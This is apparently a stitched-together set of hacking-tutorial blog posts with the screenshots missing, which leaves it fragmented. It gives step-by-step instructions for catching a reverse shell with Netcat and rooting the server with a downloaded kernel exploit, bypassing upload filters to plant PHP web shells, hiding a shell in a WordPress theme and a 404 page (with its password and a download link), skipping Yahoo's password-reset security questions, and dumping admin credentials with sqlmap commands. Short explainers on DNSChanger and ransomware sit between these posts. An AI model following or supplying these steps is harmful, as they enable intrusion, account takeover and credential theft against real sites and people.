Open the Terminal and proceed as shown below:

Now, let’s check what all parameters can be passed to it:

Now, suppose my target website is ‘thecybersaviours.com‘, I write something like:

I wanted to the save into some output.txt file, so I did it for the same. Now, once We press ‘Enter‘, it starts scanning and lists out the complete available data from the source specified as:

This is it. You can even find the associated user details from the target website in LinkedIn as well.

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

Assuming that I have already uploaded a shell on some website on the server with a change that specifies the attacker’s IP and the appropriate port as shown below:

Now, the attacker with the IP ‘192.168.48.189‘ starts listening for a connection through Netcat as:

Now, my shell on the server looks something like:

with several PHP backconnect links. As soon as I click on one of them, the terminal window which was listening for the connection, shows up like this:

Type uname to get the server version running as:

Cool, it’s 3.0.0-12-generic! The attacker googles for the version’s exploit by searching ‘Linux server 3.0.0-12-generic exploit‘ and gets one for him. In our case let it be ‘exploit.c‘

Now, traverse to the ‘/tmp‘ directory, which is always writable. Next, the attacker creates a custom directory there (say ‘exploit‘ ) as:

The attacker has successfully created the ‘exploit‘ directory and added the exploit.c file to it. Now, he needs to compile the exploit.c file and create an output file (say it to be ‘rooted‘) in the same directory. To do so, the attacker proceeds further like:

This is almost done. The attacker now changes the file permission of rooted to ‘777‘ as:

Now execute the output file and done!

The attacker types ‘id‘ and he can see that he has successfully gained the root access to the server.

FYI: You can also check the readme file to find further details about the exploit I used for this demo at http://dl.dropbox.com/u/57335721/linux_rooting_info_TCS

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

What exactly is a Domain Name Server (DNS) ?

Suppose that we enter a particular URL, say http://thecybersaviours.com, the request passes on to the associated DNS servers to resolve this domain name to its corresponding IP address. There is a chain of requests to the DNS servers until and unless the domain name is resolved, that completely depends on my ISP, the DNS servers it provides. Following is the image that shows it all:

Image Credit: www.howstuffworks.com

By default, the ISP automatically assigns us the DNS servers, though we know that some computer geeks prefer entering them manually.

A brief insight into DHCP

DHCP stands for Dynamic Host Configuration Protocol. I will be very straightforward and precise in explaining you. The moment you connect yourselves to the internet, the DHCP server automatically assigns the IP address to your computer, default gateway, subnet mask, the DNS server and other IP configuration parameters. Actually, these parameters are managed by the DHCP servers. DHCP servers manage the pool of IP addresses too, such that the next moment when client disconnects from the internet, the previously assigned IP address gets added back to the pool. I hope you more or less got the basic idea.

How DNS Changer works?

DNS Changer is a dreadful trojan, also referred to be the variants of the Zlob Family. Basically, they try penetrating into a network running DHCP servers for dynamic configuration and getting access to the  gateway/router. They bruteforce the device login with common username and passwords, and once successful, enter the configuration setting of the devices and change the ISP’s genuine DNS servers to fraudulent ones, which are operated remotely by the criminals. Once these device settings get screwed, the impact can be seen in all the terminals/computers attached to it, though they haven’t been actually infected by the trojan. The malicious/rogue DNS servers redirect the genuine URLs to open fraudulent and malicious websites.

FBI are said to have uncovered the network of those malicious DNS servers operating  behind the scenes, but they have been stopped from disabling them, since there still are the victims who rely on these malicious DNS servers for the DNS services. FBI has temporarily arranged the clean DNS servers for these infected victims providing them with the time space to get themselves out this infection and get it fixed, instead of explicitly shutting down the rogue DNS servers immediately. These clean DNS servers are most commonly referred as the Ghost Click servers. According to the court orders, the malicious and the temporarily established clean DNS servers will be shut down on June 9 and the infected computers still relying on them won’t be able to access the internet and their internet connection would go dark.

What if you have been already infected?

Consult a computer professional and take a backup of your docs before getting started with the cleaning process.

For the cure and supplementary reading, you can also take a look at http://digitalsaliva.com/internet-shutdown-9july-dns-changer/

Just recently, Google pledged to warn users whose computers or home routers appear to be infected with the DNSChanger malware.

So let’s check if the PHP filetype get uploaded or not. I browse to a file say ‘shell-upload-test.php’ file and click on the upload button as shown below:

Now the attacker wonders how then can he upload his shell? But he has an idea. He installs the Tamper Data Mozilla Add-on first. Then he renames the current shell filename from ‘shell-upload-test.php’  to ‘shell-upload-test.php.jpg’ . Cool! Now he browses for this renamed file ‘shell-upload-test.php.jpg’ as:

Just before clicking the ‘Upload File button, the attacker opens up the Tamper Data application and starts the tamper as:

Now, switch back to the uploader and  he clicks the ‘Upload File‘ button. As soon as it is clicked, the window pops up as:

Click on ‘Tamper‘ and get going. A bigger window shows then. On the right side top of that window, the attacker sees the textarea containing the actual post data. He finds the filename ‘shell-upload-test.php.jpg’  and renames it back to ‘shell-upload-test.php’ as shown below:

Renaming it looks like:

Clicking on ‘OK‘ now submits the altered data to the server and the uploader now notifies that the ‘File has been uploaded successfully‘ as it can be seen in the below figure:

Great! Now all is done. The attacker judges out the upload directory and can see his shell as he wanted it to be.

This is it! Instead of the sample text being displayed, the attacker would have seen the actual shell output in its place. I hope this was better explained. As for any queries after going through this post, you can very well post in your comments.

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

Infection and Prevention

So the first question you might be wondering about how exactly the victim gets infected? The infection might take place because of the vulnerable network service or downloading untrusted files over the internet. So think twice before clicking and downloading any untrusted links/files, which you will further in this article come to know, how worst this can go.

How does this malware work?

Once the victim’s system gets infected with this Ransomware, the payload gets triggered. This might act crazy with the system, encrypting some or whole of the victim’s data, modifying the MBR (Master Boot Record) and even lock down the system completely, asking the victim for a ransom to get it fixed. In some other cases, the victims get notified about being involved in illegal online activities and say it to be issued by some law enforcing agencies. Consequently it further states that the victim has to pay out some money immediately to get relieved of this. In some even more worse conditions, the malware encrypts the victim’s system data using Hybrid Encryption Technique, in which the plain text is encrypted by a random symmetric key and further this symmetric key is encrypted with a fixed public key generated by the malware itself. Now, it pops up saying that if the victim wants all of the data to be decrypted back again to its normal form, pay the ransom of say, 100 dollars! On the other hand, the victims have no other choice than to pay the malware authors and get everything fixed. Googling around I found a snapshot as well which is shown below:

Image Credit: http://malwaretips.com/

In the news

Back in August 2010, ten individuals were caught for playing with WinLock, a ransomware, which reportedly displayed pornographic images and asked the victim to send a US$10 text message to receive the unlock code. The involved group was said to have earned around US$16 million in this scam.

In 2011, a ransomware attack said that the victim’s operating system installation needs to be re-activated due to some reasons and they need to call on some international numbers to get it done. Actually the call used to get routed to some malicious operator which begins charging the victim with high call rates keeping their call on hold.

In 2012, another ransomware surfaced itself, containing notices from the law enforcement agencies that the victim is involved in illegal activities and that the system contains pornographic videos and spam messages related to terrorist activities. It further asks the victim to pay the fine through Ukash or Paysafecard payment platforms, since their service are anonymous and difficult to be traced.

Recommended reads on some recent Ransomware news

http://www.zdnet.co.uk/news/security-threats/2012/05/08/ransomware-locks-up-pcs-in-fake-anti-piracy-campaign-40155180/

http://www.net-security.org/malware_news.php?id=2102

I hope this was an intriguing and interesting topic to read on, as we just came across yet another wonder scenario to how destructive a malware could be.

So let’s check out how exactly this is accomplished.

The attacker logs into the victim’s account Dashboard, goes to the Appearance menu on the left hand side and selects the submenu ‘Editor‘ as shown below:

Clicking on ‘Editor‘, the attacker is taken to editing the ‘style.css’ of the currently active theme. To the right of it, click on ’comments.php’ as shown:

Now the ‘comments.php‘ opens in the editor. The attacker deletes the current content of the file and puts in his own shell code as shown:

I have entered the custom php code for demo. The attacker enters his own custom php shell code instead. Update the changes and open up the browser and go to something like:

http://127.0.0.1/wordpress/wp-content/themes/assembler/comments.php

which nothing but runs the ‘comments.php’ file on the server thereby running the malicious shell, which can be further taken to the extent of defacing the victim’s website.

Also you might be wondering that since the attacker has already logged in to the victim’s dashboard, what’s the use then to upload the shell?

The answer is that the attacker is not yet happy with just the dashboard access. So, in order to get access to the main index file, that may or may not be present in the currently active WordPress theme, the attacker prefers uploading a shell and finding the way to ‘index.php’ file, which on being found, he/she screws it down further leading to the complete defacement of the website.

This is it. I hope this was worth looking at. You might have read several topics on the same but this was my way to presenting it. Thank you all and stay tuned!

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

Assuming the attacker is in action, he goes to mail.yahoo.com and clicks to ‘I can’t access my account‘ below the submit button as:

The moment after clicking, the attacker gets directed to the following page:

Clicking ‘Next‘, Yahoo asks for the Email ID and the captcha verification page:

Start the Tamper Data Firefox Add-on, click on ‘Start Tampering’ and click ‘Next‘ on the Yahoo captcha page. The attacker now sees the pop-up window as:

Change the stage data you see in the input box from ‘fe110‘ to ‘fe200‘ and click ‘OK‘ and ‘Submit‘. The security questions part gets skipped and you see the password reset page asking for the new password details as:

Clicks ‘Next‘ when done, ‘continue tampering‘ and ‘Submit‘ until he gets the Password successfully changed prompt. ALl done! The attacker can now login to the victim’s account using the new password and re-activate it as easily.

AOL and Hotmail can be exploited the same way with few variations. You can take a look at the walk-through and demo videos here.

Credits: The Hacker News

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

input {
   background-color: #FFFFFF;
   border: 1px solid #FFFFFF;
   margin: 0;
}

What people, especially the newbie bloggers think, is that ‘shuckkks! It’s just that the requested content does not exist so it’s fine, I reached the 404 page. Okay, no worries! let’s get back and look for something else.‘ And completely ignores it most unknowingly.

But nope, the impression is very much deceiving. This is actually the 404 shell I am talking about. Clicking somewhere around the center where the ‘Not Found‘ text ends, the attacker notices the input box shows up abruptly, which actually asks for the password which is in my case, ‘ap3x_nd_h4ck0′ without quotes.

Cool! Now what happens when the attacker enter the password. He enters the limitless world in the form of shell interface:

So now, everything is in front of the attacker, from where he can lodge loads of malicious attacks without even getting noticed.

This shell was released by Ap3x_nd_h4ck0 and is still being used by the hackers for malicious motives.

Download Link: http://www.mediafire.com/?42zpcmyndcnjbg6

Suggestion: It’s better keep an eye on your 404 not found page as well, in case you encounter any and get familiar to how exactly the 404 page on your website looks like. That might help figuring out instantly.

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

Download: http://themole.nasel.com.ar/?q=downloads

Quick Installation for Ubuntu/Backtrack:

$ sudo apt-get install python3 python3-lxml
$ wget http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-lin-src.tar.gz/download
$ tar xzvf themole-0.2.6-lin-src.tar.gz
$ cd themole-0.2.6

After the installation  of required packages and Mole, we are ready to start with the process.

I have developed a local SQL vulnerable PHP application, which looks like shown below. If you too need a copy for your testing purpose, do mail me.

Once I login, I enter the vulnerable page as shown below:

Now, this is the URL we will be checking for SQL injection using Mole.

http://127.0.0.1:xxxx/vulnerable/index.php/?id=1

Now,  open the terminal. I have Mole directory on my Desktop so I will be proceeding as:

-u is for the vulnerable URL
-n or -needle is for the needle, that might be any strong keyword on the website

Now press ‘Enter‘ and you will get to see something like:

Type in ‘Schemas‘ as shown below and press ‘Enter‘:

Now to dump the table names from the selected database, type in ‘tables <database-name>‘ as:

Type ‘columns <database-name> <table-name>‘ to dump the column names of the selected database.

Finally, dump the columns as ‘query <database-name> <table-name> column-1,column-2‘

This is it, we have successfully dumped the database using Mole.

I hope it was well described and you enjoyed it throughout!

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.

You can download SQL map at http://sourceforge.net/projects/sqlmap/files/

Extract it in some folder. I assume I have extracted in on my Ubuntu Desktop in SQLmap directory and have some vulnerable website link as http://www.website.com/?id=3

1. So I open the terminal and quickly jump to my SQLmap directory as:

cd Desktop/SQLmap

2.  Now, type the following in your terminal and press ‘Enter‘ as:

python ./sqlmap.py -u http://www.website.com/?id=3 --dbs

You can have the usage overview which are to be used when specifying the target URL. The wonder is that SQLmap can process the Google Dorks as well for you.

-d DIRECT           Direct connection to the database
-u URL, --url=URL   Target url
-l LIST             Parse targets from Burp or WebScarab proxy logs
-r REQUESTFILE      Load HTTP request from a file
-g GOOGLEDORK       Process Google dork results as target urls
-c CONFIGFILE       Load options from a configuration INI file

and –dbs is for databases enumeration or in simple words, get an extensive details about the databases. You can check more of these at http://sqlmap.sourceforge.net/doc/README.html#s5

3. As soon as you press ‘Enter‘, you will get to see something like:

4. It checks for all the SQL Injection possibilities and if found will list out the available databases at the end of the process.

5. Now, type in the command as:

python ./sqlmap.py -u http://www.website.com/?id=3 -D database_name --tables

Note that -D is to explore or enumerate a particular database and –tables is used to list out all the tables present in it.

6. Check out for the admin table in which you can find the usernames and passwords and enumerate it as:

python ./sqlmap.py -u http://www.website.com/?id=3 -D database_name -T admin_table --columns

7. Once the columns get listed. Select the ones you want to dump (assume here to be admin_username and admin_password are the ones I want to dump) and write the following in your terminal:

python ./sqlmap.py -u http://www.website.com/?id=3 -D database_name -T admin_table -C admin_password, admin_username --dump

This is it. All the entries in the respective columns get dumped and you are done. Go step-wise and you won’t miss any.

I hope it was well described and you enjoyed it throughout!

Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of thecybersaviours will not be responsible for any misuse of this post.